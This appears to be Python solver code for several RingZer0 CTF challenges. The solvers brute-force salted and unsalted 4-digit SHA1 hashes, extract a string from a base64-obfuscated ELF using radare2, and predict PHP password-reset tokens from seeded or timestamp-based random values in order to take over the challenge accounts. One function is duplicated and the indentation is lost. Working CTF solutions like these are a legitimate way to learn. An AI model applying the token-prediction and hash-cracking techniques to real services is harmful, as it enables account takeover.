def ch56():
ch, s = 56, ringzer0.login()
sections = ringzer0.read_challenge(s, ch)
title, xhash = sections['title'], sections['hash']
ringzer0.output('solving')
charset = '0123456789'
result = search_hash(charset, 4, 4, hashlib.sha1, xhash)
if result is None:
ringzer0.error('could not lookup hash ' + xhash)
ringzer0.output('solved', result)
response = ringzer0.submit_challenge(s, ch, result)
ringzer0.output('response', response)
def ch57():
ch, s = 57, ringzer0.login()
sections = ringzer0.read_challenge(s, ch)
title, xhash, xsalt = sections['title'], sections['hash'], sections['salt']
ringzer0.output('solving')
charset = '0123456789'
transformation = lambda x: x + xsalt
result = search_hash(charset, 4, 4, hashlib.sha1, xhash, transformation)
if result is None:
ringzer0.error('could not lookup hash ' + xhash)
result = result[:result.rindex(xsalt)]
ringzer0.output('solved', result)
response = ringzer0.submit_challenge(s, ch, result)
ringzer0.output('response', response)
def ch57():
ch, s = 57, ringzer0.login()
sections = ringzer0.read_challenge(s, ch)
title, xhash, xsalt = sections['title'], sections['hash'], sections['salt']
ringzer0.output('solving')
charset = '0123456789'
transformation = lambda x: x + xsalt
result = search_hash(charset, 4, 4, hashlib.sha1, xhash, transformation)
if result is None:
ringzer0.error('could not lookup hash ' + xhash)
result = result[:result.rindex(xsalt)]
ringzer0.output('solved', result)
response = ringzer0.submit_challenge(s, ch, result)
ringzer0.output('response', response)
def ch15():
ch, s = 15, ringzer0.login()
sections = ringzer0.read_challenge(s, ch)
title, msg, chksum = sections['title'], sections['elf message'], sections['checksum']
ringzer0.output('solving')
elf = msg
while re.match(r'^[a-zA-Z0-9+/]*={0,3}$', elf):
elf = base64.b64decode(elf)
elf = elf[::-1]
elf_md5 = hashlib.md5(elf).hexdigest()
if chksum != elf_md5:
ringzer0.error('checksum mismatch ({0} vs {1})'.format(chksum, elf_md5))
result = ''
with ringzer0.tmpfile() as (fd, fn):
ringzer0.write_bin_file(fd, elf)
r2 = r2pipe.open(fn)
asm_lines = r2.cmd('aa; s sym.main; pif~&mov,rbp').splitlines()
asm_rg = re.compile(r'^mov [^,]*\[rbp\s?-\s?([0-9a-fx]+)\],\s?([^\s]+)$')
asm_vals, top = {}, 0
for asm_line in asm_lines:
rx = re.match(asm_rg, asm_line)
if not rx:
continue
pos, val = rx.group(1), rx.group(2)
if val.startswith('r'):
continue
if val.startswith('0x'): val = val[2:]
if len(val) % 2 == 1: val = '0' + val
pos, val = int(pos, 16), val.decode('hex')
asm_vals[pos] = val
top = max(top, pos)
stack = bytearray('\0' * top)
for k in sorted(asm_vals, reverse=True):
v = asm_vals[k]
stack[top - k:len(v)] = v[::-1]
result = stack[:stack.index('\00')]
ringzer0.output('solved', result)
response = ringzer0.submit_challenge(s, ch, result)
ringzer0.output('response', response)
def ch120():
ringzer0.output('creating token')
token = ''
for i in range(0, 16):
output = check_output(['./php-xrandom', '0', str(i), '0', '0']).strip()
for line in output.split('\n'):
rtype, rvalue = line.split(':')
rtype, rvalue = rtype.strip(), rvalue.strip()
if rtype != 'linux.rand.64':
continue
d = int(rvalue) % 10
token += str(d)
break
ringzer0.output('token', token)
ch, s = 120, ringzer0.login()
ch_url = ringzer0.get_url('/challenges/{0}'.format(int(ch)))
password = None
for i in xrange(0, 50):
ringzer0.output('resetting password')
r = s.post(ch_url, data={'reset_username':''})
response = ringzer0.get_response(r.text)
ringzer0.output('reset #{0} => {1}'.format(i, response))
r = s.get('{0}/?k={1}'.format(ch_url, token))
response = ringzer0.get_response(r.text)
if response.find('password') != -1:
password = response
break
ringzer0.output('try #{0} => {1}'.format(i, response))
time.sleep(1.75)
if password is None:
ringzer0.error('could not solve.')
sys.exit(1)
password = password.split(' ')[-1:][0]
ringzer0.output('solved', password)
r = s.post(ch_url, data={'username':'******', 'password':password})
response = ringzer0.get_response(r.text)
ringzer0.output('response', response)
def ch113():
ch, s = 113, ringzer0.login()
ch_url = ringzer0.get_url('/challenges/{0}'.format(int(ch)))
ringzer0.output('solving')
ringzer0.output('resetting password')
r = s.post(ch_url, data={'reset_username':''})
lines = ringzer0.get_lines(r.text)
r2822 = lines[0]
ts = mktime_tz(parsedate_tz(r2822))
rmin, rmax = 1000000000000000, 9999999999999999
ringzer0.output('seeding random values')
password, sec_diff = None, 1
for sec in range(0, sec_diff + 1):
if password: break
diff = sec_diff - sec
seed = ts - diff
output = check_output(['./php-xrandom', str(seed), '0', str(rmin), str(rmax)]).strip()
for line in output.split('\n'):
rtype, rvalue = line.split(':')
rtype, rvalue = rtype.strip(), rvalue.strip()
if rtype != 'linux.rand.64':
continue
r = s.get('{0}/?k={1}'.format(ch_url, rvalue))
response = ringzer0.get_response(r.text)
ringzer0.output('try: {0}s => {1} ({2}) => {3}'.format(-diff, rvalue, rtype, response))
if response.find('password') != -1:
password = response
break
if password is None:
ringzer0.error('could not solve.')
sys.exit(1)
password = password.split(' ')[-1:][0]
ringzer0.output('solved', password)
r = s.post(ch_url, data={'username':'******', 'password':password})
response = ringzer0.get_response(r.text)
ringzer0.output('response', response)